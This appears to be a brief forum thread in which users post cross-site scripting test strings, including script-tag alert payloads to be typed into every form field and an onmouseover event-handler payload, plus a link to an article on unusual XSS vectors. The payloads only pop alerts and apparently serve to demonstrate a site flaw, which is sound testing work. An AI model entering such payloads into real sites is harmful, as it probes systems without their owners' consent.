It looks like you're new here. If you want to get involved, click one of these buttons!
<script>alert(\"XSS\")</scipt>
to recreate what i had, just type
<script>alert("<!--XSS-->")</script>
in all the fields, and just select anything for the dropdowns
http://www.thespanner.co.uk/2007/11/19/unusual-xss-vectors/
<p onmouseover=alert(/XSS/)>Some very long paragraph goes here.</p>
to recreate what i had, just type
<script>alert("<!--XSS-->")</script>
in all the fields, and just select anything for the dropdowns